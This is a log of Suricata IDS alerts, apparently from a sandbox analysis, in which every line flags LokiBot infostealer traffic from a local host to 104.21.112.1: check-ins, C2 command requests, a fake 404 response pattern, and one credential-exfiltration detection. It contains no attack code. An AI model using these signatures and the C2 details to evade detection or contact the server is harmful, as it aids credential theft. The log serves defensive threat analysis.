Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49761 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49767 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49767 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49756 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49773 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49773 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49749 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49744 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49761 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49749 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49773 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:49740 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49749 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49750 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49744 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49749 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49743 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49765 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49765 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49750 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49759 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49765 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49768 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49750 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49773 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49759 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49759 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49765 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49767 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49750 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49759 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49752 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49752 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49752 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49783 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49783 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49783 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49752 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49766 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49766 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49766 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49783 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49772 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49772 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49772 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.112.1:80 -> 192.168.2.4:49749
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49766 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49772 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.112.1:80 -> 192.168.2.4:49767
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.112.1:80 -> 192.168.2.4:49756
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.112.1:80 -> 192.168.2.4:49752
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.112.1:80 -> 192.168.2.4:49765
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.112.1:80 -> 192.168.2.4:49773
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49769 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49769 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49769 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49769 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49806 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49806 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49806 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49742 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49742 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49742 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49806 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.112.1:80 -> 192.168.2.4:49772
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.112.1:80 -> 192.168.2.4:49768
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49742 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.112.1:80 -> 192.168.2.4:49783
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49820 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.112.1:80 -> 192.168.2.4:49760
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49820 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49820 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49771 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.112.1:80 -> 192.168.2.4:49750
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49771 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49820 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49771 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.112.1:80 -> 192.168.2.4:49743
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49836 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49836 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49836 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49771 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49785 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49785 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49785 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49836 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49847 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49847 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49762 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49762 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49847 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49762 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49785 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49847 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49762 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49863 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49863 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49863 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49863 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.112.1:80 -> 192.168.2.4:49771
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49874 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49874 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49874 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.112.1:80 -> 192.168.2.4:49820
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.112.1:80 -> 192.168.2.4:49847
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49874 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49763 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49763 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49763 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49902 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49890 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49902 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49902 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49917 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49917 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49890 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49917 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49763 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.112.1:80 -> 192.168.2.4:49836
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49890 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49890 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49902 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.112.1:80 -> 192.168.2.4:49863
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.112.1:80 -> 192.168.2.4:49785
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49917 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49941 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49941 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49941 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.112.1:80 -> 192.168.2.4:49890
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49928 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49928 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49928 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49928 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.112.1:80 -> 192.168.2.4:49917
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49941 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.112.1:80 -> 192.168.2.4:49928
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.112.1:80 -> 192.168.2.4:49763
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49950 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49950 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49950 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49950 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49961 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49961 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49961 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49961 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49985 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49985 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49985 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49985 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.112.1:80 -> 192.168.2.4:49950
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50001 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50012 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50001 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50001 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50012 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50012 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50001 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.112.1:80 -> 192.168.2.4:49941
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50039 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50039 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50039 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50023 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50012 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50023 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50023 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50039 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.112.1:80 -> 192.168.2.4:49985
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50052 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50052 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50023 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50052 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50052 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50068 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50068 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50068 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50068 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.112.1:80 -> 192.168.2.4:50039
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50082 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50082 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50082 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50089 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50089 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50089 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50084 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50086 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50082 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50088 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50089 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50088 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50088 -> 104.21.112.1:80
